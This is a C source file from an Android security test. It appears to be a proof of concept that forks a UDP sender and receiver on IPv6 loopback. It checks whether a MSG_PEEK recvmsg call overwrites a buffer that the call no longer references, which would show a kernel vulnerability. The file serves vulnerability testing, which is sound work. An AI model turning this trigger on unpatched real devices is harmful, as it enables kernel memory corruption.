/**
 * Copyright (C) 2018 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
#include <sys/types.h>
#include <sys/wait.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

#define EVIL_STRING "123456789\x00OVERWRITE\x00"
int udp_send()
{
  int s;
  struct sockaddr_in6 addr;
  char data[160];
  s = socket(AF_INET6, SOCK_DGRAM, IPPROTO_IP);
  memset(&addr, 0, sizeof(addr));
  addr.sin6_family = AF_INET6;
  addr.sin6_port = htons(43786);
  inet_pton(AF_INET6, "::1", &(addr.sin6_addr));
  sendto(s, "data", 4, 0, (struct sockaddr*)&addr, sizeof(addr));
  memset(data, 0, sizeof(data));
  memcpy(data, EVIL_STRING, sizeof(EVIL_STRING));
  sendto(s, data, sizeof(data), 0, (struct sockaddr*)&addr, sizeof(addr));
  return 0;
}

int udp_recv()
{
  int s;
  struct sockaddr_in6 addr;
  struct msghdr msg;
  struct iovec iov[2];
  char buf1[10], buf2[10], buf3[10];

  s = socket(AF_INET6, SOCK_DGRAM, IPPROTO_IP);
  memset(&addr, 0, sizeof(addr));
  addr.sin6_family = AF_INET6;
  addr.sin6_port = htons(43786);
  inet_pton(AF_INET6, "::", &(addr.sin6_addr));
  bind(s, (struct sockaddr*)&addr, 128);

  memset(buf1, 0, sizeof(buf1));
  memset(buf2, 0, sizeof(buf2));
  memset(buf3, 0, sizeof(buf3));
  memset(iov,  0, sizeof(iov));
  memset(&msg, 0, sizeof(msg));
  msg.msg_iov = iov;
  msg.msg_iovlen = 2;
  iov[0].iov_base = buf1;
  iov[0].iov_len = sizeof(buf1);
  iov[1].iov_base = buf2;
  iov[1].iov_len = sizeof(buf2);
  recvmsg(s, &msg, 0);

  memset(buf1, 0, sizeof(buf1));
  memset(buf2, 0, sizeof(buf2)); // buf2 is zeroed here.
  memset(buf3, 0, sizeof(buf3));
  memset(iov,  0, sizeof(iov));
  memset(&msg, 0, sizeof(msg));
  msg.msg_iov = iov;
  msg.msg_iovlen = 1;
  iov[0].iov_base = buf3;
  iov[0].iov_len = sizeof(buf3);
  recvmsg(s, &msg, MSG_PEEK); // No refrence to buf2 in this call.

  printf("%s\n", buf2); // If buf2 has contents OVERWRITE, a vuln has occured.
  return 0; // Exploit must occur in a forked process, return 113 won't work here.
}

int main()
{
  pid_t send, recv;
  int status = 0;
  if ((recv = fork()) == 0)
    exit(udp_recv());
  sleep(1);
  if ((send = fork()) == 0)
    exit(udp_send());
  for (pid_t pid = wait(&status); pid > 0; pid = wait(&status));
}